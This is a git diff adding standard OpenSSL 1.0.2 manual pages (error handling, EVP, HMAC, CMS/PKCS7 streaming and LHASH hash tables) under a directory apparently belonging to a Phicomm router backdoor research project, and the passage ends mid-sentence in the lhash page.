+The L<ERR_get_error(3)|ERR_get_error(3)> manpage describes how to
+access error codes.
+
+Error codes contain information about where the error occurred, and
+what went wrong. L<ERR_GET_LIB(3)|ERR_GET_LIB(3)> describes how to
+extract this information. A method to obtain human-readable error
+messages is described in L<ERR_error_string(3)|ERR_error_string(3)>.
+
+L<ERR_clear_error(3)|ERR_clear_error(3)> can be used to clear the
+error queue.
+
+Note that L<ERR_remove_state(3)|ERR_remove_state(3)> should be used to
+avoid memory leaks when threads are terminated.
+
+=head1 ADDING NEW ERROR CODES TO OPENSSL
+
+See L<ERR_put_error(3)> if you want to record error codes in the
+OpenSSL error system from within your application.
+
+The remainder of this section is of interest only if you want to add
+new error codes to OpenSSL or add error codes from external libraries.
+
+=head2 Reporting errors
+
+Each sub-library has a specific macro XXXerr() that is used to report
+errors. Its first argument is a function code B<XXX_F_...>, the second
+argument is a reason code B<XXX_R_...>. Function codes are derived
+from the function names; reason codes consist of textual error
+descriptions. For example, the function ssl23_read() reports a
+"handshake failure" as follows:
+
+ SSLerr(SSL_F_SSL23_READ, SSL_R_SSL_HANDSHAKE_FAILURE);
+
+Function and reason codes should consist of upper case characters,
+numbers and underscores only. The error file generation script translates
+function codes into function names by looking in the header files
+for an appropriate function name, if none is found it just uses
+the capitalized form such as "SSL23_READ" in the above example.
+
+The trailing section of a reason code (after the "_R_") is translated
+into lower case and underscores changed to spaces.
+
+When you are using new function or reason codes, run B<make errors>.
+The necessary B<#define>s will then automatically be added to the
+sub-library's header file.
+
+Although a library will normally report errors using its own specific
+XXXerr macro, another library's macro can be used. This is normally
+only done when a library wants to include ASN1 code which must use
+the ASN1err() macro.
+
+=head2 Adding new libraries
+
+When adding a new sub-library to OpenSSL, assign it a library number
+B<ERR_LIB_XXX>, define a macro XXXerr() (both in B<err.h>), add its
+name to B<ERR_str_libraries[]> (in B<crypto/err/err.c>), and add
+C<ERR_load_XXX_strings()> to the ERR_load_crypto_strings() function
+(in B<crypto/err/err_all.c>). Finally, add an entry
+
+ L	XXX	xxx.h	xxx_err.c
+
+to B<crypto/err/openssl.ec>, and add B<xxx_err.c> to the Makefile.
+Running B<make errors> will then generate a file B<xxx_err.c>, and
+add all error codes used in the library to B<xxx.h>.
+
+Additionally the library include file must have a certain form.
+Typically it will initially look like this:
+
+ #ifndef HEADER_XXX_H
+ #define HEADER_XXX_H
+
+ #ifdef __cplusplus
+ extern "C" {
+ #endif
+
+ /* Include files */
+
+ #include <openssl/bio.h>
+ #include <openssl/x509.h>
+
+ /* Macros, structures and function prototypes */
+
+
+ /* BEGIN ERROR CODES */
+
+The B<BEGIN ERROR CODES> sequence is used by the error code
+generation script as the point to place new error codes, any text
+after this point will be overwritten when B<make errors> is run.
+The closing #endif etc will be automatically added by the script.
+
+The generated C error code file B<xxx_err.c> will load the header
+files B<stdio.h>, B<openssl/err.h> and B<openssl/xxx.h> so the
+header file must load any additional header files containing any
+definitions it uses.
+
+=head1 USING ERROR CODES IN EXTERNAL LIBRARIES
+
+It is also possible to use OpenSSL's error code scheme in external
+libraries. The library needs to load its own codes and call the OpenSSL
+error code insertion script B<mkerr.pl> explicitly to add codes to
+the header file and generate the C error code file. This will normally
+be done if the external library needs to generate new ASN1 structures
+but it can also be used to add more general purpose error code handling.
+
+TBA more details
+
+=head1 INTERNALS
+
+The error queues are stored in a hash table with one B<ERR_STATE>
+entry for each pid. ERR_get_state() returns the current thread's
+B<ERR_STATE>. An B<ERR_STATE> can hold up to B<ERR_NUM_ERRORS> error
+codes. When more error codes are added, the old ones are overwritten,
+on the assumption that the most recent errors are most important.
+
+Error strings are also stored in hash table. The hash tables can
+be obtained by calling ERR_get_err_state_table(void) and
+ERR_get_string_table(void) respectively.
+
+=head1 SEE ALSO
+
+L<CRYPTO_set_locking_callback(3)|CRYPTO_set_locking_callback(3)>,
+L<ERR_get_error(3)|ERR_get_error(3)>,
+L<ERR_GET_LIB(3)|ERR_GET_LIB(3)>,
+L<ERR_clear_error(3)|ERR_clear_error(3)>,
+L<ERR_error_string(3)|ERR_error_string(3)>,
+L<ERR_print_errors(3)|ERR_print_errors(3)>,
+L<ERR_load_crypto_strings(3)|ERR_load_crypto_strings(3)>,
+L<ERR_remove_state(3)|ERR_remove_state(3)>,
+L<ERR_put_error(3)|ERR_put_error(3)>,
+L<ERR_load_strings(3)|ERR_load_strings(3)>,
+L<SSL_get_error(3)|SSL_get_error(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/evp.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/evp.pod
new file mode 100644
index 0000000..29fab9f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/evp.pod
@@ -0,0 +1,103 @@
+=pod
+
+=head1 NAME
+
+evp - high-level cryptographic functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/evp.h>
+
+=head1 DESCRIPTION
+
+The EVP library provides a high-level interface to cryptographic
+functions.
+
+L<B<EVP_Seal>I<...>|EVP_SealInit(3)> and L<B<EVP_Open>I<...>|EVP_OpenInit(3)>
+provide public key encryption and decryption to implement digital "envelopes".
+
+The L<B<EVP_DigestSign>I<...>|EVP_DigestSignInit(3)> and
+L<B<EVP_DigestVerify>I<...>|EVP_DigestVerifyInit(3)> functions implement
+digital signatures and Message Authentication Codes (MACs). Also see the older
+L<B<EVP_Sign>I<...>|EVP_SignInit(3)> and L<B<EVP_Verify>I<...>|EVP_VerifyInit(3)>
+functions.
+
+Symmetric encryption is available with the L<B<EVP_Encrypt>I<...>|EVP_EncryptInit(3)>
+functions.  The L<B<EVP_Digest>I<...>|EVP_DigestInit(3)> functions provide message digests.
+
+The B<EVP_PKEY>I<...> functions provide a high level interface to
+asymmetric algorithms. To create a new EVP_PKEY see
+L<EVP_PKEY_new(3)|EVP_PKEY_new(3)>. EVP_PKEYs can be associated
+with a private key of a particular algorithm by using the functions
+described on the L<EVP_PKEY_set1_RSA(3)|EVP_PKEY_set1_RSA(3)> page, or
+new keys can be generated using L<EVP_PKEY_keygen(3)|EVP_PKEY_keygen(3)>.
+EVP_PKEYs can be compared using L<EVP_PKEY_cmp(3)|EVP_PKEY_cmp(3)>, or printed using
+L<EVP_PKEY_print_private(3)|EVP_PKEY_print_private(3)>.
+
+The EVP_PKEY functions support the full range of asymmetric algorithm operations:
+
+=over
+
+=item For key agreement see L<EVP_PKEY_derive(3)|EVP_PKEY_derive(3)>
+
+=item For signing and verifying see L<EVP_PKEY_sign(3)|EVP_PKEY_sign(3)>,
+L<EVP_PKEY_verify(3)|EVP_PKEY_verify(3)> and L<EVP_PKEY_verify_recover(3)|EVP_PKEY_verify_recover(3)>.
+However, note that
+these functions do not perform a digest of the data to be signed. Therefore
+normally you would use the L<B<EVP_DigestSign>I<...>|EVP_DigestSignInit(3)>
+functions for this purpose.
+
+=item For encryption and decryption see L<EVP_PKEY_encrypt(3)|EVP_PKEY_encrypt(3)>
+and L<EVP_PKEY_decrypt(3)|EVP_PKEY_decrypt(3)> respectively. However, note that
+these functions perform encryption and decryption only. As public key
+encryption is an expensive operation, normally you would wrap
+an encrypted message in a "digital envelope" using the L<B<EVP_Seal>I<...>|EVP_SealInit(3)> and
+L<B<EVP_Open>I<...>|EVP_OpenInit(3)> functions.
+
+=back
+
+The L<EVP_BytesToKey(3)|EVP_BytesToKey(3)> function provides some limited support for password
+based encryption. Careful selection of the parameters will provide a PKCS#5 PBKDF1 compatible
+implementation. However, new applications should not typically use this (preferring, for example,
+PBKDF2 from PCKS#5).
+
+Algorithms are loaded with L<OpenSSL_add_all_algorithms(3)|OpenSSL_add_all_algorithms(3)>.
+
+All the symmetric algorithms (ciphers), digests and asymmetric algorithms
+(public key algorithms) can be replaced by L<ENGINE|engine(3)> modules providing alternative
+implementations. If ENGINE implementations of ciphers or digests are registered
+as defaults, then the various EVP functions will automatically use those
+implementations automatically in preference to built in software
+implementations. For more information, consult the engine(3) man page.
+
+Although low level algorithm specific functions exist for many algorithms
+their use is discouraged. They cannot be used with an ENGINE and ENGINE
+versions of new algorithms cannot be accessed using the low level functions.
+Also makes code harder to adapt to new algorithms and some options are not 
+cleanly supported at the low level and some operations are more efficient
+using the high level interface.
+
+=head1 SEE ALSO
+
+L<EVP_DigestInit(3)|EVP_DigestInit(3)>,
+L<EVP_EncryptInit(3)|EVP_EncryptInit(3)>,
+L<EVP_OpenInit(3)|EVP_OpenInit(3)>,
+L<EVP_SealInit(3)|EVP_SealInit(3)>,
+L<EVP_DigestSignInit(3)|EVP_DigestSignInit(3)>,
+L<EVP_SignInit(3)|EVP_SignInit(3)>,
+L<EVP_VerifyInit(3)|EVP_VerifyInit(3)>,
+L<EVP_PKEY_new(3)|EVP_PKEY_new(3)>,
+L<EVP_PKEY_set1_RSA(3)|EVP_PKEY_set1_RSA(3)>,
+L<EVP_PKEY_keygen(3)|EVP_PKEY_keygen(3)>,
+L<EVP_PKEY_print_private(3)|EVP_PKEY_print_private(3)>,
+L<EVP_PKEY_decrypt(3)|EVP_PKEY_decrypt(3)>,
+L<EVP_PKEY_encrypt(3)|EVP_PKEY_encrypt(3)>,
+L<EVP_PKEY_sign(3)|EVP_PKEY_sign(3)>,
+L<EVP_PKEY_verify(3)|EVP_PKEY_verify(3)>,
+L<EVP_PKEY_verify_recover(3)|EVP_PKEY_verify_recover(3)>,
+L<EVP_PKEY_derive(3)|EVP_PKEY_derive(3)>,
+L<EVP_BytesToKey(3)|EVP_BytesToKey(3)>,
+L<OpenSSL_add_all_algorithms(3)|OpenSSL_add_all_algorithms(3)>,
+L<engine(3)|engine(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/hmac.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/hmac.pod
new file mode 100644
index 0000000..58a57f4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/hmac.pod
@@ -0,0 +1,106 @@
+=pod
+
+=head1 NAME
+
+HMAC, HMAC_CTX_init, HMAC_Init, HMAC_Init_ex, HMAC_Update, HMAC_Final, HMAC_CTX_cleanup,
+HMAC_cleanup - HMAC message authentication code
+
+=head1 SYNOPSIS
+
+ #include <openssl/hmac.h>
+
+ unsigned char *HMAC(const EVP_MD *evp_md, const void *key,
+               int key_len, const unsigned char *d, int n,
+               unsigned char *md, unsigned int *md_len);
+
+ void HMAC_CTX_init(HMAC_CTX *ctx);
+
+ int HMAC_Init(HMAC_CTX *ctx, const void *key, int key_len,
+               const EVP_MD *md);
+ int HMAC_Init_ex(HMAC_CTX *ctx, const void *key, int key_len,
+               	   const EVP_MD *md, ENGINE *impl);
+ int HMAC_Update(HMAC_CTX *ctx, const unsigned char *data, int len);
+ int HMAC_Final(HMAC_CTX *ctx, unsigned char *md, unsigned int *len);
+
+ void HMAC_CTX_cleanup(HMAC_CTX *ctx);
+ void HMAC_cleanup(HMAC_CTX *ctx);
+
+=head1 DESCRIPTION
+
+HMAC is a MAC (message authentication code), i.e. a keyed hash
+function used for message authentication, which is based on a hash
+function.
+
+HMAC() computes the message authentication code of the B<n> bytes at
+B<d> using the hash function B<evp_md> and the key B<key> which is
+B<key_len> bytes long.
+
+It places the result in B<md> (which must have space for the output of
+the hash function, which is no more than B<EVP_MAX_MD_SIZE> bytes).
+If B<md> is NULL, the digest is placed in a static array.  The size of
+the output is placed in B<md_len>, unless it is B<NULL>.
+
+B<evp_md> can be EVP_sha1(), EVP_ripemd160() etc.
+
+HMAC_CTX_init() initialises a B<HMAC_CTX> before first use. It must be
+called.
+
+HMAC_CTX_cleanup() erases the key and other data from the B<HMAC_CTX>
+and releases any associated resources. It must be called when an
+B<HMAC_CTX> is no longer required.
+
+HMAC_cleanup() is an alias for HMAC_CTX_cleanup() included for back
+compatibility with 0.9.6b, it is deprecated.
+
+The following functions may be used if the message is not completely
+stored in memory:
+
+HMAC_Init() initializes a B<HMAC_CTX> structure to use the hash
+function B<evp_md> and the key B<key> which is B<key_len> bytes
+long. It is deprecated and only included for backward compatibility
+with OpenSSL 0.9.6b.
+
+HMAC_Init_ex() initializes or reuses a B<HMAC_CTX> structure to use
+the function B<evp_md> and key B<key>. Either can be NULL, in which
+case the existing one will be reused. HMAC_CTX_init() must have been
+called before the first use of an B<HMAC_CTX> in this
+function. B<N.B. HMAC_Init() had this undocumented behaviour in
+previous versions of OpenSSL - failure to switch to HMAC_Init_ex() in
+programs that expect it will cause them to stop working>.
+
+HMAC_Update() can be called repeatedly with chunks of the message to
+be authenticated (B<len> bytes at B<data>).
+
+HMAC_Final() places the message authentication code in B<md>, which
+must have space for the hash function output.
+
+=head1 RETURN VALUES
+
+HMAC() returns a pointer to the message authentication code or NULL if
+an error occurred.
+
+HMAC_Init_ex(), HMAC_Update() and HMAC_Final() return 1 for success or 0 if
+an error occurred.
+
+HMAC_CTX_init() and HMAC_CTX_cleanup() do not return values.
+
+=head1 CONFORMING TO
+
+RFC 2104
+
+=head1 SEE ALSO
+
+L<sha(3)|sha(3)>, L<evp(3)|evp(3)>
+
+=head1 HISTORY
+
+HMAC(), HMAC_Init(), HMAC_Update(), HMAC_Final() and HMAC_cleanup()
+are available since SSLeay 0.9.0.
+
+HMAC_CTX_init(), HMAC_Init_ex() and HMAC_CTX_cleanup() are available
+since OpenSSL 0.9.7.
+
+HMAC_Init_ex(), HMAC_Update() and HMAC_Final() did not return values in
+versions of OpenSSL before 1.0.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/i2d_CMS_bio_stream.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/i2d_CMS_bio_stream.pod
new file mode 100644
index 0000000..558bdd0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/i2d_CMS_bio_stream.pod
@@ -0,0 +1,44 @@
+=pod
+
+=head1 NAME
+
+ i2d_CMS_bio_stream - output CMS_ContentInfo structure in BER format.
+
+=head1 SYNOPSIS
+
+ #include <openssl/cms.h>
+
+ int i2d_CMS_bio_stream(BIO *out, CMS_ContentInfo *cms, BIO *data, int flags);
+
+=head1 DESCRIPTION
+
+i2d_CMS_bio_stream() outputs a CMS_ContentInfo structure in BER format.
+
+It is otherwise identical to the function SMIME_write_CMS().
+
+=head1 NOTES
+
+This function is effectively a version of the i2d_CMS_bio() supporting
+streaming.
+
+=head1 BUGS
+
+The prefix "i2d" is arguably wrong because the function outputs BER format.
+
+=head1 RETURN VALUES
+
+i2d_CMS_bio_stream() returns 1 for success or 0 for failure.
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<CMS_sign(3)|CMS_sign(3)>,
+L<CMS_verify(3)|CMS_verify(3)>, L<CMS_encrypt(3)|CMS_encrypt(3)>
+L<CMS_decrypt(3)|CMS_decrypt(3)>,
+L<SMIME_write_CMS(3)|SMIME_write_CMS(3)>,
+L<PEM_write_bio_CMS_stream(3)|PEM_write_bio_CMS_stream(3)>
+
+=head1 HISTORY
+
+i2d_CMS_bio_stream() was added to OpenSSL 1.0.0
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/i2d_PKCS7_bio_stream.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/i2d_PKCS7_bio_stream.pod
new file mode 100644
index 0000000..a37231e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/i2d_PKCS7_bio_stream.pod
@@ -0,0 +1,44 @@
+=pod
+
+=head1 NAME
+
+i2d_PKCS7_bio_stream - output PKCS7 structure in BER format.
+
+=head1 SYNOPSIS
+
+ #include <openssl/pkcs7.h>
+
+ int i2d_PKCS7_bio_stream(BIO *out, PKCS7 *p7, BIO *data, int flags);
+
+=head1 DESCRIPTION
+
+i2d_PKCS7_bio_stream() outputs a PKCS7 structure in BER format.
+
+It is otherwise identical to the function SMIME_write_PKCS7().
+
+=head1 NOTES
+
+This function is effectively a version of the d2i_PKCS7_bio() supporting
+streaming.
+
+=head1 BUGS
+
+The prefix "i2d" is arguably wrong because the function outputs BER format.
+
+=head1 RETURN VALUES
+
+i2d_PKCS7_bio_stream() returns 1 for success or 0 for failure.
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<PKCS7_sign(3)|PKCS7_sign(3)>,
+L<PKCS7_verify(3)|PKCS7_verify(3)>, L<PKCS7_encrypt(3)|PKCS7_encrypt(3)>
+L<PKCS7_decrypt(3)|PKCS7_decrypt(3)>,
+L<SMIME_write_PKCS7(3)|SMIME_write_PKCS7(3)>,
+L<PEM_write_bio_PKCS7_stream(3)|PEM_write_bio_PKCS7_stream(3)>
+
+=head1 HISTORY
+
+i2d_PKCS7_bio_stream() was added to OpenSSL 1.0.0
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/lh_stats.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/lh_stats.pod
new file mode 100644
index 0000000..3eeaa72
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/lh_stats.pod
@@ -0,0 +1,60 @@
+=pod
+
+=head1 NAME
+
+lh_stats, lh_node_stats, lh_node_usage_stats, lh_stats_bio,
+lh_node_stats_bio, lh_node_usage_stats_bio - LHASH statistics
+
+=head1 SYNOPSIS
+
+ #include <openssl/lhash.h>
+
+ void lh_stats(LHASH *table, FILE *out);
+ void lh_node_stats(LHASH *table, FILE *out);
+ void lh_node_usage_stats(LHASH *table, FILE *out);
+
+ void lh_stats_bio(LHASH *table, BIO *out);
+ void lh_node_stats_bio(LHASH *table, BIO *out);
+ void lh_node_usage_stats_bio(LHASH *table, BIO *out);
+
+=head1 DESCRIPTION
+
+The B<LHASH> structure records statistics about most aspects of
+accessing the hash table.  This is mostly a legacy of Eric Young
+writing this library for the reasons of implementing what looked like
+a nice algorithm rather than for a particular software product.
+
+lh_stats() prints out statistics on the size of the hash table, how
+many entries are in it, and the number and result of calls to the
+routines in this library.
+
+lh_node_stats() prints the number of entries for each 'bucket' in the
+hash table.
+
+lh_node_usage_stats() prints out a short summary of the state of the
+hash table.  It prints the 'load' and the 'actual load'.  The load is
+the average number of data items per 'bucket' in the hash table.  The
+'actual load' is the average number of items per 'bucket', but only
+for buckets which contain entries.  So the 'actual load' is the
+average number of searches that will need to find an item in the hash
+table, while the 'load' is the average number that will be done to
+record a miss.
+
+lh_stats_bio(), lh_node_stats_bio() and lh_node_usage_stats_bio()
+are the same as the above, except that the output goes to a B<BIO>.
+
+=head1 RETURN VALUES
+
+These functions do not return values.
+
+=head1 SEE ALSO
+
+L<bio(3)|bio(3)>, L<lhash(3)|lhash(3)>
+
+=head1 HISTORY
+
+These functions are available in all versions of SSLeay and OpenSSL.
+
+This manpage is derived from the SSLeay documentation.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/lhash.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/lhash.pod
new file mode 100644
index 0000000..73a19b6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/lhash.pod
@@ -0,0 +1,302 @@
+=pod
+
+=head1 NAME
+
+lh_new, lh_free, lh_insert, lh_delete, lh_retrieve, lh_doall, lh_doall_arg, lh_error - dynamic hash table
+
+=head1 SYNOPSIS
+
+ #include <openssl/lhash.h>
+
+ DECLARE_LHASH_OF(<type>);
+
+ LHASH *lh_<type>_new();
+ void lh_<type>_free(LHASH_OF(<type> *table);
+
+ <type> *lh_<type>_insert(LHASH_OF(<type> *table, <type> *data);
+ <type> *lh_<type>_delete(LHASH_OF(<type> *table, <type> *data);
+ <type> *lh_retrieve(LHASH_OF<type> *table, <type> *data);
+
+ void lh_<type>_doall(LHASH_OF(<type> *table, LHASH_DOALL_FN_TYPE func);
+ void lh_<type>_doall_arg(LHASH_OF(<type> *table, LHASH_DOALL_ARG_FN_TYPE func,
+          <type2>, <type2> *arg);
+
+ int lh_<type>_error(LHASH_OF(<type> *table);
+
+ typedef int (*LHASH_COMP_FN_TYPE)(const void *, const void *);
+ typedef unsigned long (*LHASH_HASH_FN_TYPE)(const void *);
+ typedef void (*LHASH_DOALL_FN_TYPE)(const void *);
+ typedef void (*LHASH_DOALL_ARG_FN_TYPE)(const void *, const void *);
+
+=head1 DESCRIPTION
+
+This library implements type-checked dynamic hash tables. The hash
+table entries can be arbitrary structures. Usually they consist of key
+and value fields.
+
+lh_<type>_new() creates a new B<LHASH_OF(<type>> structure to store
+arbitrary data entries, and provides the 'hash' and 'compare'
+callbacks to be used in organising the table's entries.  The B<hash>
+callback takes a pointer to a table entry as its argument and returns
+an unsigned long hash value for its key field.  The hash value is
+normally truncated to a power of 2, so make sure that your hash
+function returns well mixed low order bits.  The B<compare> callback
+takes two arguments (pointers to two hash table entries), and returns
+0 if their keys are equal, non-zero otherwise.  If your hash table
+will contain items of some particular type and the B<hash> and
+B<compare> callbacks hash/compare these types, then the
+B<DECLARE_LHASH_HASH_FN> and B<IMPLEMENT_LHASH_COMP_FN> macros can be
+used to create callback wrappers of the prototypes required by
+lh_<type>_new().  These provide per-variable casts before calling the
+type-specific callbacks written by the application author.  These
+macros, as well as those used for the "doall" callbacks, are defined
+as;
+
+ #define DECLARE_LHASH_HASH_FN(name, o_type) \
+	 unsigned long name##_LHASH_HASH(const void *);
+ #define IMPLEMENT_LHASH_HASH_FN(name, o_type) \
+	 unsigned long name##_LHASH_HASH(const void *arg) { \
+		 const o_type *a = arg; \
+		 return name##_hash(a); }
+ #define LHASH_HASH_FN(name) name##_LHASH_HASH
+
+ #define DECLARE_LHASH_COMP_FN(name, o_type) \
+	 int name##_LHASH_COMP(const void *, const void *);
+ #define IMPLEMENT_LHASH_COMP_FN(name, o_type) \
+	 int name##_LHASH_COMP(const void *arg1, const void *arg2) { \
+		 const o_type *a = arg1;		    \
+		 const o_type *b = arg2; \
+		 return name##_cmp(a,b); }
+ #define LHASH_COMP_FN(name) name##_LHASH_COMP
+
+ #define DECLARE_LHASH_DOALL_FN(name, o_type) \
+	 void name##_LHASH_DOALL(void *);
+ #define IMPLEMENT_LHASH_DOALL_FN(name, o_type) \
+	 void name##_LHASH_DOALL(void *arg) { \
+		 o_type *a = arg; \
+		 name##_doall(a); }
+ #define LHASH_DOALL_FN(name) name##_LHASH_DOALL
+
+ #define DECLARE_LHASH_DOALL_ARG_FN(name, o_type, a_type) \
+	 void name##_LHASH_DOALL_ARG(void *, void *);
+ #define IMPLEMENT_LHASH_DOALL_ARG_FN(name, o_type, a_type) \
+	 void name##_LHASH_DOALL_ARG(void *arg1, void *arg2) { \
+		 o_type *a = arg1; \
+		 a_type *b = arg2; \
+		 name##_doall_arg(a, b); }
+ #define LHASH_DOALL_ARG_FN(name) name##_LHASH_DOALL_ARG
+
+ An example of a hash table storing (pointers to) structures of type 'STUFF'
+ could be defined as follows;
+
+ /* Calculates the hash value of 'tohash' (implemented elsewhere) */
+ unsigned long STUFF_hash(const STUFF *tohash);
+ /* Orders 'arg1' and 'arg2' (implemented elsewhere) */
+ int stuff_cmp(const STUFF *arg1, const STUFF *arg2);
+ /* Create the type-safe wrapper functions for use in the LHASH internals */
+ static IMPLEMENT_LHASH_HASH_FN(stuff, STUFF);
+ static IMPLEMENT_LHASH_COMP_FN(stuff, STUFF);
+ /* ... */
+ int main(int argc, char *argv[]) {
+         /* Create the new hash table using the hash/compare wrappers */
+         LHASH_OF(STUFF) *hashtable = lh_STUFF_new(LHASH_HASH_FN(STUFF_hash),
+                                   LHASH_COMP_FN(STUFF_cmp));
+	 /* ... */
+ }
+
+lh_<type>_free() frees the B<LHASH_OF(<type>> structure
+B<table>. Allocated hash table entries will not be freed; consider
+using lh_<type>_doall() to deallocate any remaining entries in the
+hash table (see below).
+
+lh_<type>_insert() inserts the structure pointed to by B<data> into
+B<table>.  If there already is an entry with the same key, the old
+value is replaced. Note that lh_<type>_insert() stores pointers, the
+data are not copied.
+
+lh_<type>_delete() deletes an entry from B<table>.
+
+lh_<type>_retrieve() looks up an entry in B<table>. Normally, B<data>
+is a structure with the key field(s) set; the function will return a
+pointer to a fully populated structure.
+
+lh_<type>_doall() will, for every entry in the hash table, call
+B<func> with the data item as its parameter.  For lh_<type>_doall()
+and lh_<type>_doall_arg(), function pointer casting should be avoided
+in the callbacks (see B<NOTE>) - instead use the declare/implement
+macros to create type-checked wrappers that cast variables prior to
+calling your type-specific callbacks.  An example of this is
+illustrated here where the callback is used to cleanup resources for
+items in the hash table prior to the hashtable itself being
+deallocated:
+
+ /* Cleans up resources belonging to 'a' (this is implemented elsewhere) */
+ void STUFF_cleanup_doall(STUFF *a);
+ /* Implement a prototype-compatible wrapper for "STUFF_cleanup" */
+ IMPLEMENT_LHASH_DOALL_FN(STUFF_cleanup, STUFF)
+         /* ... then later in the code ... */
+ /* So to run "STUFF_cleanup" against all items in a hash table ... */
+ lh_STUFF_doall(hashtable, LHASH_DOALL_FN(STUFF_cleanup));
+ /* Then the hash table itself can be deallocated */
+ lh_STUFF_free(hashtable);
+
+When doing this, be careful if you delete entries from the hash table
+in your callbacks: the table may decrease in size, moving the item
+that you are currently on down lower in the hash table - this could
+cause some entries to be skipped during the iteration.  The second
+best solution to this problem is to set hash-E<gt>down_load=0 before
+you start (which will stop the hash table ever decreasing in size).
+The best solution is probably to avoid deleting items from the hash
+table inside a "doall" callback!
+
+lh_<type>_doall_arg() is the same as lh_<type>_doall() except that
+B<func> will be called with B<arg> as the second argument and B<func>
+should be of type B<LHASH_DOALL_ARG_FN_TYPE> (a callback prototype
+that is passed both the table entry and an extra argument).  As with
+lh_doall(), you can instead choose to declare your callback with a
+prototype matching the types you are dealing with and use the
+declare/implement macros to create compatible wrappers that cast
+variables before calling your type-specific callbacks.  An example of
+this is demonstrated here (printing all hash table entries to a BIO
+that is provided by the caller):
+
+ /* Prints item 'a' to 'output_bio' (this is implemented elsewhere) */
+ void STUFF_print_doall_arg(const STUFF *a, BIO *output_bio);
+ /* Implement a prototype-compatible wrapper for "STUFF_print" */
+ static IMPLEMENT_LHASH_DOALL_ARG_FN(STUFF, const STUFF, BIO)
+         /* ... then later in the code ... */
+ /* Print out the entire hashtable to a particular BIO */
+ lh_STUFF_doall_arg(hashtable, LHASH_DOALL_ARG_FN(STUFF_print), BIO,
+                    logging_bio);
+ 
+lh_<type>_error() can be used to determine if an error occurred in the last
+operation. lh_<type>_error() is a macro.
+
+=head1 RETURN VALUES
+
+lh_<type>_new() returns B<NULL> on error, otherwise a pointer to the new
+B<LHASH> structure.
+
+When a hash table entry is replaced, lh_<type>_insert() returns the value
+being replaced. B<NULL> is returned on normal operation and on error.
+
+lh_<type>_delete() returns the entry being deleted.  B<NULL> is returned if
+there is no such value in the hash table.
+
+lh_<type>_retrieve() returns the hash table entry if it has been found,
+B<NULL> otherwise.
+
+lh_<type>_error() returns 1 if an error occurred in the last operation, 0
+otherwise.
+
+lh_<type>_free(), lh_<type>_doall() and lh_<type>_doall_arg() return no values.
+
+=head1 NOTE
+
+The various LHASH macros and callback types exist to make it possible
+to write type-checked code without resorting to function-prototype
+casting - an evil that makes application code much harder to
+audit/verify and also opens the window of opportunity for stack
+corruption and other hard-to-find bugs.  It also, apparently, violates
+ANSI-C.
+
+The LHASH code regards table entries as constant data.  As such, it
+internally represents lh_insert()'d items with a "const void *"
+pointer type.  This is why callbacks such as those used by lh_doall()
+and lh_doall_arg() declare their prototypes with "const", even for the
+parameters that pass back the table items' data pointers - for
+consistency, user-provided data is "const" at all times as far as the
+LHASH code is concerned.  However, as callers are themselves providing
+these pointers, they can choose whether they too should be treating
+all such parameters as constant.
+
+As an example, a hash table may be maintained by code that, for
+reasons of encapsulation, has only "const" access to the data being
+indexed in the hash table (ie. it is returned as "const" from
+elsewhere in their code) - in this case the LHASH prototypes are
+appropriate as-is.  Conversely, if the caller is responsible for the
+life-time of the data in question, then they may well wish to make
+modifications to table item passed back in the lh_doall() or
+lh_doall_arg() callbacks (see the "STUFF_cleanup" example above).  If
+so, the caller can either cast the "const" away (if they're providing
+the raw callbacks themselves) or use the macros to declare/implement
+the wrapper functions without "const" types.
+
+Callers that only have "const" access to data they're indexing in a
+table, yet declare callbacks without constant types (or cast the
+"const" away themselves), are therefore creating their own risks/bugs
+without being encouraged to do so by the API.  On a related note,
+those auditing code should pay special attention to any instances of
+DECLARE/IMPLEMENT_LHASH_DOALL_[ARG_]_FN macros that provide types
+without any "const" qualifiers.
+
+=head1 BUGS
+
+lh_<type>_insert() returns B<NULL> both for success and error.
+
+=head1 INTERNALS
+
+The following description is based on the SSLeay documentation:
+
+The B<lhash> library implements a hash table described in the
+I<Communications of the ACM> in 1991.  What makes this hash table
+different is that as the table fills, the hash table is increased (or
+decreased) in size via OPENSSL_realloc().  When a 'resize' is done, instead of
+all hashes being redistributed over twice as many 'buckets', one
+bucket is split.  So when an 'expand' is done, there is only a minimal
+cost to redistribute some values.  Subsequent inserts will cause more
+single 'bucket' redistributions but there will never be a sudden large
+cost due to redistributing all the 'buckets'.
+
+The state for a particular hash table is kept in the B<LHASH> structure.
+The decision to increase or decrease the hash table size is made
+depending on the 'load' of the hash table.  The load is the number of
+items in the hash table divided by the size of the hash table.  The
+default values are as follows.  If (hash->up_load E<lt> load) =E<gt>
